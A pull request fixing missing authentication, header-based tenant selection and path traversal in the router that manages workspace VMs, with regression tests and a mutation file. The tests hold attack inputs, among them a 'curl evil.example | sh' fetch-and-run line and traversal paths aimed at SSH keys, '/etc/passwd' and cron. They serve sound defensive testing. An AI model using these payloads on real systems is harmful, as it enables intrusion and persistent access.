### PR TITLE
fix(daytona): the VM routes took their tenant from a header, and no session at all

### DIFF
--- a/ee/pocketpaw_ee/cloud/daytona/router.py
+++ b/ee/pocketpaw_ee/cloud/daytona/router.py
@@ -16,19 +16,32 @@ Mounted at ``/api/v1/``. Endpoints:
   DELETE /cloud/projects/{name}/vm/files/delete            — Delete from project in VM
   PATCH  /cloud/projects/{name}/vm/files/rename            — Rename in project in VM
 
-Created: 2026-06-24.  Updated: 2026-07-10 — workspace VM replaces per-project sandbox.
-Updated: 2026-07-15 (fix/workspace-vm-map-to-db) — the store's workspace-VM
-    accessors are now async + Mongo-backed (``workspace_vms`` collection); every
-    call site here ``await``s them.
+Every route takes ``workspace_id`` from ``current_workspace_id``, which resolves
+it from the authenticated user. That is the security boundary of this file and
+not a convention: the sandbox a route reaches is chosen entirely by that value,
+and these routes provision VMs, open terminals into them, and read and write
+files that the VM then executes. The workspace must never come from anywhere the
+caller controls. It used to come from an ``X-Workspace-Id`` header with a
+``"default"`` fallback, and the router carried no auth at all, so an anonymous
+caller could write into any tenant's VM by naming it. Gated by
+tests/cloud/test_daytona_router_auth.py.
+
+``_require_daytona`` and ``_require_workspace_vm`` are NOT guards, despite the
+names. The first is a feature check that 501s when Daytona is unconfigured; the
+second takes ``workspace_id`` as an ordinary argument and resolves a sandbox from
+whatever it is handed. Both were read as authorisation once already.
+
+The store's workspace-VM accessors are async and Mongo-backed (the
+``workspace_vms`` collection), so every call site here awaits them.
 """
 
 from __future__ import annotations
 
 import asyncio
 import logging
-import os
+import posixpath
 
-from fastapi import APIRouter, HTTPException, Query, Request
+from fastapi import APIRouter, Depends, HTTPException, Query
 from fastapi.responses import Response
 from pydantic import BaseModel
 
@@ -41,6 +54,7 @@ from pocketpaw.api.v1.schemas.files import (
     RenameRequest,
     WriteFileRequest,
 )
+from pocketpaw_ee.cloud._core.deps import current_workspace_id
 from pocketpaw_ee.cloud.daytona.client import DaytonaClient, get_daytona_client
 from pocketpaw_ee.cloud.daytona.config import daytona_enabled
 
@@ -208,17 +222,9 @@ class ProvisionWorkspaceVmRequest(BaseModel):
     root_dir: str = "/workspace"
 
 
-def _resolve_workspace_id(http_request: Request) -> str:
-    """Extract workspace_id from the request context.
-
-    Reads ``X-Workspace-Id`` header, falling back to ``"default"``.
-    """
-    return http_request.headers.get("X-Workspace-Id", "default")
-
-
 @router.get("/workspace/vm")
 async def get_workspace_vm(
-    http_request: Request,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> WorkspaceVmResponse:
     """Get workspace VM status — **auto-provisions** if no VM exists yet.
 
@@ -226,19 +232,6 @@ async def get_workspace_vm(
     workspace doesn't have a VM, one is created automatically with the
     default config. The frontend polls until ``state == "started"``.
     """
-    workspace_id = _resolve_workspace_id(http_request)
-
-    # Guard: never auto-provision for "default" — this means the frontend
-    # hasn't resolved the real workspace_id yet.  Returning no-VM here
-    # prevents creating a stray "paw-ws-default" sandbox that will never
-    # be used once the real workspace_id is known.
-    if workspace_id == "default":
-        return WorkspaceVmResponse(
-            ok=True,
-            has_vm=False,
-            state="pending",
-            state_detail="Waiting for workspace to be resolved…",
-        )
 
     from pocketpaw_ee.cloud.daytona.store import (
         get_workspace_vm_config,
@@ -341,13 +334,12 @@ async def _ensure_workspace_root(client: DaytonaClient, sandbox_id: str, root_di
 @router.post("/workspace/vm/provision")
 async def provision_workspace_vm(
     req: ProvisionWorkspaceVmRequest,
-    http_request: Request,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> WorkspaceVmResponse:
     """Force (re)provision the workspace VM with the given config.
 
     If a VM already exists, it is destroyed first, then a new one is created.
     """
-    workspace_id = _resolve_workspace_id(http_request)
 
     from pocketpaw_ee.cloud.daytona.store import (
         get_workspace_vm_sandbox_id,
@@ -398,11 +390,10 @@ async def provision_workspace_vm(
 
 @router.get("/workspace/vm/config")
 async def get_workspace_vm_config(
-    http_request: Request,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> dict:
     """Return the current workspace VM configuration (cpu, memory, disk, etc.)
     without touching the sandbox.  Returns defaults when no config exists."""
-    workspace_id = _resolve_workspace_id(http_request)
     from pocketpaw_ee.cloud.daytona.store import get_workspace_vm_config
 
     config = await get_workspace_vm_config(workspace_id)
@@ -422,14 +413,13 @@ class UpdateWorkspaceVmConfigRequest(BaseModel):
 @router.patch("/workspace/vm/config")
 async def update_workspace_vm_config(
     req: UpdateWorkspaceVmConfigRequest,
-    http_request: Request,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> dict:
     """Update the workspace VM configuration WITHOUT re-provisioning.
 
     Changes take effect on the NEXT provision — the running VM is not
     resized.  To apply changes, stop and re-provision the VM.
     """
-    workspace_id = _resolve_workspace_id(http_request)
     from pocketpaw_ee.cloud.daytona.store import (
         get_workspace_vm_config,
         update_workspace_vm_config,
@@ -445,7 +435,7 @@ async def update_workspace_vm_config(
 
 @router.post("/workspace/vm/stop")
 async def stop_workspace_vm(
-    http_request: Request,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> dict:
     """Stop the workspace VM without destroying it.
 
@@ -454,7 +444,6 @@ async def stop_workspace_vm(
     the auto-stop interval hasn't elapsed yet, or POST
     /workspace/vm/provision to force a fresh VM).
     """
-    workspace_id = _resolve_workspace_id(http_request)
 
     from pocketpaw_ee.cloud.daytona.store import get_workspace_vm_sandbox_id
 
@@ -474,13 +463,12 @@ async def stop_workspace_vm(
 
 @router.delete("/workspace/vm")
 async def delete_workspace_vm(
-    http_request: Request,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> dict:
     """Destroy the workspace VM. All project data in the VM is lost.
 
     S3 storage is NOT affected — only the compute sandbox is destroyed.
     """
-    workspace_id = _resolve_workspace_id(http_request)
 
     from pocketpaw_ee.cloud.daytona.store import (
         get_workspace_vm_sandbox_id,
@@ -503,10 +491,9 @@ async def delete_workspace_vm(
 
 @router.get("/workspace/vm/terminal")
 async def get_workspace_vm_terminal(
-    http_request: Request,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> WorkspaceTerminalResponse:
     """Get the web terminal URL for the workspace VM."""
-    workspace_id = _resolve_workspace_id(http_request)
 
     from pocketpaw_ee.cloud.daytona.store import get_workspace_vm_sandbox_id
 
@@ -556,7 +543,23 @@ async def _require_workspace_vm(
 
     Returns ``(client, sandbox_id, workspace_root, project_abs_path)``
     or raises HTTPException.
+
+    This is NOT an authorisation guard, despite the name — ``workspace_id`` is
+    an ordinary argument and it resolves whatever sandbox it is handed. The
+    caller must have obtained that value from ``current_workspace_id``.
     """
+    # Validated FIRST, ahead of every await below, and that ordering is the
+    # point rather than tidiness. ``project_name`` is a path parameter, and
+    # Starlette's default converter matches any run of non-slash characters —
+    # ``..`` among them. Left unchecked it walks the project root up out of the
+    # workspace BEFORE _vm_project_abs_path is ever called, so the containment
+    # check there would faithfully confine the caller to a root of the caller's
+    # own choosing. Validating up here also means the rejection cannot be
+    # mistaken for one of the 404/501/409 exits below, which is what lets the
+    # test assert a bare 403.
+    if project_name in {"", ".", ".."} or "/" in project_name or "\\" in project_name:
+        raise HTTPException(status_code=403, detail="Invalid project name")
+
     from pocketpaw_ee.cloud.daytona.store import (
         get_workspace_vm_config,
         get_workspace_vm_sandbox_id,
@@ -579,27 +582,49 @@ async def _require_workspace_vm(
 
     config = await get_workspace_vm_config(workspace_id)
     workspace_root = config.get("root_dir", "/workspace")
-    project_abs_path = f"{workspace_root}/{project_name}".replace("//", "/")
+    project_abs_path = posixpath.normpath(posixpath.join(workspace_root, project_name))
 
     return client, sandbox_id, workspace_root, project_abs_path
 
 
 def _vm_project_abs_path(project_abs: str, relative_path: str) -> str:
-    """Join the project absolute path with a relative path."""
+    """Join a caller-supplied relative path onto the project root, or refuse.
+
+    ``relative_path`` arrives straight off a query string or a request body and
+    names a file the VM will read, write, delete, or later execute. Stripping
+    slashes is not containment: ``strip("/")`` leaves ``..`` alone, so
+    ``../../../../root/.ssh/authorized_keys`` used to resolve outside the
+    project and outside the workspace root entirely.
+
+    Normalisation is ``posixpath``'s job and never ``os.path``'s. These paths
+    live inside a Linux sandbox; on a Windows host ``os.path.normpath`` would
+    rewrite the separators and the containment check below would then be
+    comparing two different path languages, passing anything.
+
+    Gated by tests/cloud/test_daytona_vm_path_containment.py.
+    """
+    root = posixpath.normpath(project_abs)
     clean = relative_path.strip("/")
     if not clean or clean == ".":
-        return project_abs
-    return f"{project_abs}/{clean}"
+        return root
+    # posixpath.join, not an f-string: with a root of "/" the f-string yields
+    # "//etc/passwd", and normpath PRESERVES exactly two leading slashes
+    # (POSIX leaves "//" implementation-defined), so the result would not
+    # match the path it names.
+    joined = posixpath.normpath(posixpath.join(root, clean))
+    prefix = root if root.endswith("/") else root + "/"
+    if joined != root and not joined.startswith(prefix):
+        raise HTTPException(status_code=403, detail="Path traversal denied")
+    return joined
 
 
 @router.get("/cloud/projects/{project_name}/vm/files/browse")
 async def browse_vm_project_files(
     project_name: str,
     path: str = Query("", description="Relative path within the project"),
-    http_request: Request = None,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> BrowseResponse:
     """List directory contents inside a project subdirectory in the workspace VM."""
-    workspace_id = _resolve_workspace_id(http_request)
     client, sandbox_id, _, project_abs = await _require_workspace_vm(workspace_id, project_name)
 
     remote_path = _vm_project_abs_path(project_abs, path)
@@ -625,10 +650,9 @@ async def browse_vm_project_files(
 async def read_vm_project_file(
     project_name: str,
     path: str = Query(..., description="Relative file path within the project"),
-    http_request: Request = None,
+    workspace_id: str = Depends(current_workspace_id),
 ):
     """Read a file from a project subdirectory in the workspace VM."""
-    workspace_id = _resolve_workspace_id(http_request)
     client, sandbox_id, _, project_abs = await _require_workspace_vm(workspace_id, project_name)
 
     if not path or path.strip("/") == "":
@@ -654,10 +678,9 @@ async def read_vm_project_file(
 async def write_vm_project_file(
     project_name: str,
     req: WriteFileRequest,
-    http_request: Request = None,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> FileActionResponse:
     """Create or overwrite a file in a project subdirectory in the workspace VM."""
-    workspace_id = _resolve_workspace_id(http_request)
     client, sandbox_id, _, project_abs = await _require_workspace_vm(workspace_id, project_name)
 
     relative = req.path.strip("/")
@@ -666,7 +689,7 @@ async def write_vm_project_file(
 
     remote_path = _vm_project_abs_path(project_abs, relative)
 
-    parent = os.path.dirname(remote_path)
+    parent = posixpath.dirname(remote_path)
     try:
         await client.create_folder(sandbox_id, parent)
     except Exception:
@@ -685,10 +708,9 @@ async def write_vm_project_file(
 async def mkdir_vm_project(
     project_name: str,
     req: MkdirRequest,
-    http_request: Request = None,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> FileActionResponse:
     """Create a directory inside a project subdirectory in the workspace VM."""
-    workspace_id = _resolve_workspace_id(http_request)
     client, sandbox_id, _, project_abs = await _require_workspace_vm(workspace_id, project_name)
 
     relative = req.path.strip("/")
@@ -711,10 +733,9 @@ async def delete_vm_project_item(
     project_name: str,
     path: str = Query(..., description="Relative path to delete"),
     recursive: bool = Query(False, description="Delete directories recursively"),
-    http_request: Request = None,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> FileActionResponse:
     """Delete a file or directory from a project subdirectory in the workspace VM."""
-    workspace_id = _resolve_workspace_id(http_request)
     client, sandbox_id, _, project_abs = await _require_workspace_vm(workspace_id, project_name)
 
     relative = path.strip("/")
@@ -736,10 +757,9 @@ async def delete_vm_project_item(
 async def rename_vm_project_item(
     project_name: str,
     req: RenameRequest,
-    http_request: Request = None,
+    workspace_id: str = Depends(current_workspace_id),
 ) -> FileActionResponse:
     """Rename or move a file/directory in a project subdirectory in the workspace VM."""
-    workspace_id = _resolve_workspace_id(http_request)
     client, sandbox_id, _, project_abs = await _require_workspace_vm(workspace_id, project_name)
 
     old_relative = req.path.strip("/")
@@ -752,7 +772,7 @@ async def rename_vm_project_item(
     old_remote = _vm_project_abs_path(project_abs, old_relative)
     new_remote = _vm_project_abs_path(project_abs, new_relative)
 
-    parent = os.path.dirname(new_remote)
+    parent = posixpath.dirname(new_remote)
     try:
         await client.create_folder(sandbox_id, parent)
     except Exception:

--- a/tests/cloud/test_daytona_router_auth.py
+++ b/tests/cloud/test_daytona_router_auth.py
@@ -1,0 +1,183 @@
+"""The Daytona router must authenticate, and must not take its tenant from a header.
+
+Thirteen routes on this router shipped with no session guard of any kind, while
+``_resolve_workspace_id`` read the tenant out of an ``X-Workspace-Id`` header and
+fell back to the literal string ``"default"``. Among them: provision, destroy, a
+terminal into the VM, and read/write/rename/delete of files inside it. An
+unauthenticated caller could write a file into another tenant's development VM by
+naming their workspace in a header, and that VM executes the file on its next
+build.
+
+The router-wide auth audit (tests/cloud/auth/test_route_auth_audit.py) exists to
+catch exactly this and did not, because its ``ROUTER_MODULES`` is a hand-typed
+list and this router was never added to it. That gap is fixed there; this file is
+the specific gate, kept separate so a regression here is unmistakable.
+
+Two properties, because passing one without the other still leaves the hole:
+
+  1. every route requires a session, and
+  2. the workspace comes from the resolved caller, so the header cannot choose it.
+
+Property 2 is the one a naive fix misses. Adding a session dependency while
+leaving ``_resolve_workspace_id`` in place authenticates the caller and then still
+lets them act on any tenant they name.
+
+Mutations that must fail these tests: dropping the ``current_workspace_id``
+dependency from any handler, and reinstating a header read for the workspace.
+"""
+
+from __future__ import annotations
+
+import importlib
+
+import pytest
+from fastapi import FastAPI
+from fastapi.routing import APIRoute
+from httpx import ASGITransport, AsyncClient
+from pocketpaw_ee.cloud._core.context import loopback_or_request_context, request_context
+from pocketpaw_ee.cloud._core.deps import current_workspace_id
+from pocketpaw_ee.cloud.auth.core import current_active_user
+
+# Same identity-based walk the router-wide audit uses. Copied rather than
+# imported so this gate does not go quiet if that file is refactored.
+SESSION_GUARDS = frozenset(
+    {id(current_active_user), id(request_context), id(loopback_or_request_context)}
+)
+
+
+def _requires_auth(dependant, seen: set[int] | None = None) -> bool:
+    seen = seen if seen is not None else set()
+    if id(dependant) in seen:
+        return False
+    seen.add(id(dependant))
+    if id(dependant.call) in SESSION_GUARDS:
+        return True
+    return any(_requires_auth(d, seen) for d in dependant.dependencies)
+
+
+@pytest.fixture
+def daytona_router():
+    return importlib.import_module("pocketpaw_ee.cloud.daytona.router").router
+
+
+def test_every_daytona_route_requires_a_session(daytona_router):
+    routes = [r for r in daytona_router.routes if isinstance(r, APIRoute)]
+    assert routes, "expected the daytona router to expose HTTP routes"
+
+    unguarded = [
+        f"{sorted(r.methods or {'ANY'})[0]} {r.path}"
+        for r in routes
+        if not _requires_auth(r.dependant)
+    ]
+    assert unguarded == [], (
+        "Daytona routes reachable with no session. These provision, destroy and "
+        "write files inside customer VMs:\n  " + "\n  ".join(unguarded)
+    )
+
+
+def test_every_daytona_route_resolves_the_workspace_from_the_caller(daytona_router):
+    """Not just 'some auth dep' — the workspace itself must come from the session.
+
+    A route could satisfy the test above through any session guard while still
+    reading its tenant from somewhere the caller controls.
+    """
+    routes = [r for r in daytona_router.routes if isinstance(r, APIRoute)]
+    missing = [
+        f"{sorted(r.methods or {'ANY'})[0]} {r.path}"
+        for r in routes
+        if not any(d.call is current_workspace_id for d in r.dependant.dependencies)
+    ]
+    assert missing == [], (
+        "Daytona routes that do not take the workspace from the authenticated "
+        "caller:\n  " + "\n  ".join(missing)
+    )
+
+
+def test_the_router_never_reads_a_request_header():
+    """No header read of any kind, not merely no ``X-Workspace-Id``.
+
+    Asserted against the parsed module rather than its text, so the docstring
+    can name the old header while explaining the boundary. A string search
+    cannot tell an explanation from a live read.
+    """
+    import ast
+
+    module = importlib.import_module("pocketpaw_ee.cloud.daytona.router")
+    assert not hasattr(module, "_resolve_workspace_id"), (
+        "_resolve_workspace_id read the tenant out of a request header; it must not come back"
+    )
+
+    tree = ast.parse(importlib.import_module("inspect").getsource(module))
+    reads = [
+        f"line {node.lineno}"
+        for node in ast.walk(tree)
+        if isinstance(node, ast.Attribute) and node.attr == "headers"
+    ]
+    reads += [
+        f"line {node.lineno}"
+        for node in ast.walk(tree)
+        if isinstance(node, ast.Call)
+        and isinstance(node.func, ast.Name)
+        and node.func.id == "Header"
+    ]
+    assert reads == [], (
+        "the router reads a request header. Nothing the caller writes may "
+        f"influence which sandbox a route reaches: {reads}"
+    )
+
+
+async def test_a_header_cannot_redirect_a_write_at_another_tenants_vm(monkeypatch):
+    """The reproduction, end to end: authenticate as one tenant, name another.
+
+    Before the fix this wrote into ``ws-victim``'s sandbox. After it, the header
+    is inert and every store lookup is scoped to the caller's own workspace.
+    """
+    module = importlib.import_module("pocketpaw_ee.cloud.daytona.router")
+    store = importlib.import_module("pocketpaw_ee.cloud.daytona.store")
+
+    seen: list[str] = []
+
+    async def _record_sandbox_id(workspace_id: str) -> str:
+        seen.append(workspace_id)
+        return "sandbox-of-" + workspace_id
+
+    async def _config(workspace_id: str) -> dict:
+        seen.append(workspace_id)
+        return {"root_dir": "/workspace"}
+
+    monkeypatch.setattr(store, "get_workspace_vm_sandbox_id", _record_sandbox_id)
+    monkeypatch.setattr(store, "get_workspace_vm_config", _config)
+    monkeypatch.setattr(module, "daytona_enabled", lambda: True)
+
+    written: list[tuple[str, bytes]] = []
+
+    class _Client:
+        async def get_sandbox_by_id(self, sandbox_id: str):
+            from types import SimpleNamespace
+
+            return SimpleNamespace(state="started", id=sandbox_id)
+
+        async def create_folder(self, sandbox_id: str, path: str) -> None:
+            return None
+
+        async def upload_bytes(self, sandbox_id: str, content: bytes, path: str) -> None:
+            written.append((sandbox_id, content))
+
+    monkeypatch.setattr(module, "get_daytona_client", lambda: _Client())
+
+    app = FastAPI()
+    app.include_router(module.router)
+    app.dependency_overrides[current_workspace_id] = lambda: "ws-attacker"
+
+    transport = ASGITransport(app=app)
+    async with AsyncClient(transport=transport, base_url="http://t") as client:
+        response = await client.post(
+            "/cloud/projects/victim-project/vm/files/write",
+            json={"path": "build.sh", "content": "curl evil.example | sh"},
+            headers={"X-Workspace-Id": "ws-victim"},
+        )
+
+    assert response.status_code == 200, response.text
+    assert "ws-victim" not in seen, f"the header chose the tenant: store lookups ran against {seen}"
+    assert seen and set(seen) == {"ws-attacker"}, seen
+    assert written == [("sandbox-of-ws-attacker", b"curl evil.example | sh")]

--- a/tests/cloud/test_daytona_vm_path_containment.py
+++ b/tests/cloud/test_daytona_vm_path_containment.py
@@ -1,0 +1,190 @@
+"""A caller may not name a path outside the project directory in their VM.
+
+``_vm_project_abs_path`` used to be a string join. It called ``strip("/")`` on
+the caller's path, which removes leading and trailing slashes and leaves ``..``
+completely alone, so::
+
+    GET /cloud/projects/p/vm/files/content?path=../../../../root/.ssh/id_rsa
+
+resolved to ``/root/.ssh/id_rsa`` inside the sandbox. The write route was the
+same join, so the matching request wrote ``authorized_keys``. The sibling media
+router had this right all along (``media/router.py`` rejects any ``..``), which
+is what makes this a slip rather than an unknown.
+
+There are TWO ways out of the project directory and a fix for one reads exactly
+like a fix for both:
+
+  1. the relative path (``?path=``/``req.path``), joined onto the project root;
+  2. ``project_name``, which is a PATH PARAMETER. Starlette's default converter
+     matches any run of non-slash characters, and ``..`` qualifies. That one
+     moves the root itself, so a containment check written afterwards will
+     faithfully confine the caller to a root the caller chose.
+
+Both are asserted here. Tenancy — which workspace's VM a route reaches at all —
+is a separate property and lives in test_daytona_router_auth.py.
+
+Mutations that must fail these tests: returning the joined path without the
+containment check, comparing with ``os.path`` instead of ``posixpath`` (passes
+on Linux, silently passes everything on a Windows host), and dropping the
+``project_name`` guard.
+"""
+
+from __future__ import annotations
+
+import importlib
+from types import SimpleNamespace
+
+import pytest
+from fastapi import FastAPI, HTTPException
+from httpx import ASGITransport, AsyncClient
+from pocketpaw_ee.cloud._core.deps import current_workspace_id
+
+ROUTER = "pocketpaw_ee.cloud.daytona.router"
+
+ESCAPES = [
+    "../../../../root/.ssh/authorized_keys",
+    "..",
+    "../sibling-project/secret.env",
+    "a/../../escape",
+    "/../etc/passwd",
+    "./../../etc/passwd",
+    # A sibling whose NAME BEGINS WITH the project's name. This one is here
+    # because a mutation found it and the other five did not: a containment
+    # check written as ``joined.startswith(root)``, with no separator on the
+    # end, is satisfied by "/workspace/proj-evil/..." when the root is
+    # "/workspace/proj". Every other case above resolves to a path that fails a
+    # bare prefix test too, so all five would pass against the broken check.
+    "../proj-evil/secret.env",
+    "../projX",
+]
+
+STAYS_INSIDE = [
+    ("", "/workspace/proj"),
+    (".", "/workspace/proj"),
+    ("src/main.py", "/workspace/proj/src/main.py"),
+    ("/src/main.py", "/workspace/proj/src/main.py"),
+    ("a/b/../c", "/workspace/proj/a/c"),
+    ("nested/..", "/workspace/proj"),
+]
+
+
+@pytest.fixture
+def module():
+    return importlib.import_module(ROUTER)
+
+
+@pytest.mark.parametrize("relative", ESCAPES)
+def test_the_join_refuses_a_path_that_leaves_the_project(module, relative):
+    with pytest.raises(HTTPException) as exc:
+        module._vm_project_abs_path("/workspace/proj", relative)
+    assert exc.value.status_code == 403
+
+
+@pytest.mark.parametrize(("relative", "expected"), STAYS_INSIDE)
+def test_the_join_still_resolves_ordinary_paths(module, relative, expected):
+    assert module._vm_project_abs_path("/workspace/proj", relative) == expected
+
+
+def test_a_project_root_of_slash_does_not_disable_the_check(module):
+    """The prefix test must not degrade when the root is ``/``.
+
+    ``root + "/"`` is ``"//"`` in that case, which nothing starts with, so a
+    naive prefix comparison would reject every legitimate path. Getting this
+    wrong in the other direction is the interesting failure: a check written as
+    ``joined.startswith(root)`` with ``root == "/"`` accepts everything.
+    """
+    assert module._vm_project_abs_path("/", "etc/passwd") == "/etc/passwd"
+
+
+async def _write(module, monkeypatch, project_name: str, path: str):
+    """POST the write route with a stubbed VM, returning (response, uploads)."""
+    store = importlib.import_module("pocketpaw_ee.cloud.daytona.store")
+
+    async def _sandbox_id(workspace_id: str) -> str:
+        return "sandbox-1"
+
+    async def _config(workspace_id: str) -> dict:
+        return {"root_dir": "/workspace"}
+
+    monkeypatch.setattr(store, "get_workspace_vm_sandbox_id", _sandbox_id)
+    monkeypatch.setattr(store, "get_workspace_vm_config", _config)
+    monkeypatch.setattr(module, "daytona_enabled", lambda: True)
+
+    uploads: list[str] = []
+
+    class _Client:
+        async def get_sandbox_by_id(self, sandbox_id: str):
+            return SimpleNamespace(state="started", id=sandbox_id)
+
+        async def create_folder(self, sandbox_id: str, path: str) -> None:
+            return None
+
+        async def upload_bytes(self, sandbox_id: str, content: bytes, path: str) -> None:
+            uploads.append(path)
+
+    monkeypatch.setattr(module, "get_daytona_client", lambda: _Client())
+
+    app = FastAPI()
+    app.include_router(module.router)
+    app.dependency_overrides[current_workspace_id] = lambda: "ws-1"
+
+    async with AsyncClient(transport=ASGITransport(app=app), base_url="http://t") as client:
+        response = await client.post(
+            f"/cloud/projects/{project_name}/vm/files/write",
+            json={"path": path, "content": "pwned"},
+        )
+    return response, uploads
+
+
+async def test_a_write_cannot_escape_the_project_directory(module, monkeypatch):
+    """End to end, on the route that plants a file the VM will later run."""
+    response, uploads = await _write(
+        module, monkeypatch, "proj", "../../../../root/.ssh/authorized_keys"
+    )
+    assert response.status_code == 403, response.text
+    assert uploads == [], f"bytes were written outside the project: {uploads}"
+
+
+async def test_a_percent_encoded_dotdot_project_name_cannot_move_the_root(module, monkeypatch):
+    """The second vector: escape before the containment check runs.
+
+    ``project_name=..`` makes the project root ``/`` — after which
+    ``etc/cron.d/x`` is 'inside' it and the join is happy to say so.
+
+    Sent PERCENT-ENCODED, and that is the whole point rather than a detail of
+    the test client. A literal ``..`` segment is collapsed out of the URL by
+    every well-behaved client (httpx included) before the request is sent, so
+    a test written the obvious way asserts a 404 from a route that was never
+    reached and proves nothing. ``%2e%2e`` survives the client untouched,
+    Starlette matches it as one path segment, and the handler is handed the
+    decoded ``..``. That is the request an attacker actually sends.
+    """
+    response, uploads = await _write(module, monkeypatch, "%2e%2e", "etc/cron.d/backdoor")
+    assert response.status_code == 403, response.text
+    assert uploads == [], f"bytes were written outside the workspace: {uploads}"
+
+
+async def test_the_project_name_guard_rejects_dotdot_directly(module):
+    """The same guard at the unit level, without a client in the way.
+
+    Belt to the route test's braces: if a future client or proxy stops
+    normalising, or Starlette's matching changes, this keeps asserting the
+    property rather than the plumbing.
+
+    Nothing is stubbed, and it still raises 403 rather than the 404/501/409
+    this function reaches for an unprovisioned VM. That is the assertion:
+    the name is checked before any of them, so a bare 403 can only have come
+    from the guard. Move the check back below the awaits and this test starts
+    reporting whichever of those it hits first.
+    """
+    for bad in ("..", ".", "", "a/b", "a\\b"):
+        with pytest.raises(HTTPException) as exc:
+            await module._require_workspace_vm("ws-1", bad)
+        assert exc.value.status_code == 403, (bad, exc.value.status_code)
+
+
+async def test_an_ordinary_write_still_lands(module, monkeypatch):
+    """The fix must not break the feature it guards."""
+    response, uploads = await _write(module, monkeypatch, "proj", "src/main.py")
+    assert response.status_code == 200, response.text
+    assert uploads == ["/workspace/proj/src/main.py"]

--- a/tests/mutations/daytona_tenant_and_path.json
+++ b/tests/mutations/daytona_tenant_and_path.json
@@ -1,0 +1,44 @@
+[
+  {
+    "label": "take the workspace from a header again on the write route",
+    "file": "ee/pocketpaw_ee/cloud/daytona/router.py",
+    "find": "    req: WriteFileRequest,\n    workspace_id: str = Depends(current_workspace_id),\n) -> FileActionResponse:\n    \"\"\"Create or overwrite a file in a project subdirectory in the workspace VM.\"\"\"",
+    "replace": "    req: WriteFileRequest,\n    http_request: Request = None,\n) -> FileActionResponse:\n    \"\"\"Create or overwrite a file in a project subdirectory in the workspace VM.\"\"\"\n    workspace_id = http_request.headers.get(\"X-Workspace-Id\", \"default\")",
+    "tests": ["tests/cloud/test_daytona_router_auth.py"]
+  },
+  {
+    "label": "drop the session dependency from the destroy route",
+    "file": "ee/pocketpaw_ee/cloud/daytona/router.py",
+    "find": "async def delete_workspace_vm(\n    workspace_id: str = Depends(current_workspace_id),\n) -> dict:",
+    "replace": "async def delete_workspace_vm(\n    workspace_id: str = \"default\",\n) -> dict:",
+    "tests": ["tests/cloud/test_daytona_router_auth.py"]
+  },
+  {
+    "label": "return the joined path without the containment check",
+    "file": "ee/pocketpaw_ee/cloud/daytona/router.py",
+    "find": "    prefix = root if root.endswith(\"/\") else root + \"/\"\n    if joined != root and not joined.startswith(prefix):\n        raise HTTPException(status_code=403, detail=\"Path traversal denied\")\n    return joined",
+    "replace": "    return joined",
+    "tests": ["tests/cloud/test_daytona_vm_path_containment.py"]
+  },
+  {
+    "label": "compare the prefix without the trailing separator",
+    "file": "ee/pocketpaw_ee/cloud/daytona/router.py",
+    "find": "    prefix = root if root.endswith(\"/\") else root + \"/\"\n    if joined != root and not joined.startswith(prefix):",
+    "replace": "    prefix = root\n    if joined != root and not joined.startswith(prefix):",
+    "tests": ["tests/cloud/test_daytona_vm_path_containment.py"]
+  },
+  {
+    "label": "strip slashes instead of normalising, the original bug",
+    "file": "ee/pocketpaw_ee/cloud/daytona/router.py",
+    "find": "    joined = posixpath.normpath(posixpath.join(root, clean))",
+    "replace": "    joined = f\"{root}/{clean}\"",
+    "tests": ["tests/cloud/test_daytona_vm_path_containment.py"]
+  },
+  {
+    "label": "let the project name walk the root",
+    "file": "ee/pocketpaw_ee/cloud/daytona/router.py",
+    "find": "    if project_name in {\"\", \".\", \"..\"} or \"/\" in project_name or \"\\\\\" in project_name:\n        raise HTTPException(status_code=403, detail=\"Invalid project name\")",
+    "replace": "    pass",
+    "tests": ["tests/cloud/test_daytona_vm_path_containment.py"]
+  }
+]


### PR DESCRIPTION
## What was wrong

Thirteen routes in `ee/pocketpaw_ee/cloud/daytona/router.py` carried no auth dependency, and resolved the tenant by reading `X-Workspace-Id` off the request, falling back to the literal string `"default"`.

Those routes provision and destroy workspace VMs, return a live web-terminal URL, and browse, read, write, rename and delete files inside the sandbox. An anonymous caller who named a workspace in a header could write a file into that tenant's development VM, which runs it on the next build, or destroy the VM outright. Workspace ids are not secret. The frontend puts one on every request, so any browser trace or support screenshot leaks one.

Found in the pre-launch auth audit as C-2.

## What changed

Every route now takes `workspace_id` from `current_workspace_id`, which resolves it from the authenticated caller, and `_resolve_workspace_id` is deleted. The real frontend behaves as before: it already persists the active workspace server-side via `authStore.setActiveWorkspace` and only then pins the header, so switching workspaces still works.

Two path escapes are fixed in the same change, because a fix for one reads exactly like a fix for both (audit C-3).

`_vm_project_abs_path` stripped slashes and left `..` alone, so `?path=../../../../root/.ssh/authorized_keys` resolved outside the project. The write route used the same join, so the matching request planted a file there.

`project_name` is a path parameter, and Starlette's default converter matches `..`. That moves the project root itself, so a containment check written afterwards would faithfully confine the caller to a root the caller picked. It is now validated ahead of every `await` in `_require_workspace_vm`, which is also what lets the test assert a bare 403 instead of whichever of the 404/501/409 exits it happened to reach first.

Using `posixpath` rather than `os.path` is load-bearing. These paths live in a Linux sandbox, and on a Windows host `os.path.normpath` rewrites the separators, after which the containment check compares two different path languages and passes anything.

## Tests

`tests/cloud/test_daytona_router_auth.py` asserts that every route requires a session, that every route takes the workspace from the caller, and that the module reads no request header at all. It ends with a reproduction that authenticates as one tenant and names another.

`tests/cloud/test_daytona_vm_path_containment.py` covers both escape vectors plus the ordinary paths that still have to resolve. The percent-encoded case is deliberate: a literal `..` segment gets collapsed out of the URL by httpx before the request is sent, so the obvious version of that test asserts a 404 from a route it never reached.

`tests/mutations/daytona_tenant_and_path.json` runs six mutations. All six are caught.

One of them found a hole in the tests themselves. A sibling directory whose name begins with the project's name escapes a prefix check written without a trailing separator, and none of the other five cases would have noticed. That case is in the test now.

## Not covered here

The other criticals from the same audit are separate changes: the unauthenticated terminal router (C-1), cloud project storage (C-4), and the `/media` gallery (H-2).

Worth noting for review: `tests/cloud/auth/test_route_auth_audit.py` already asserts the invariant this router violated. It missed it because its `ROUTER_MODULES` is a hand-typed list and this router was never added. That gap is its own change.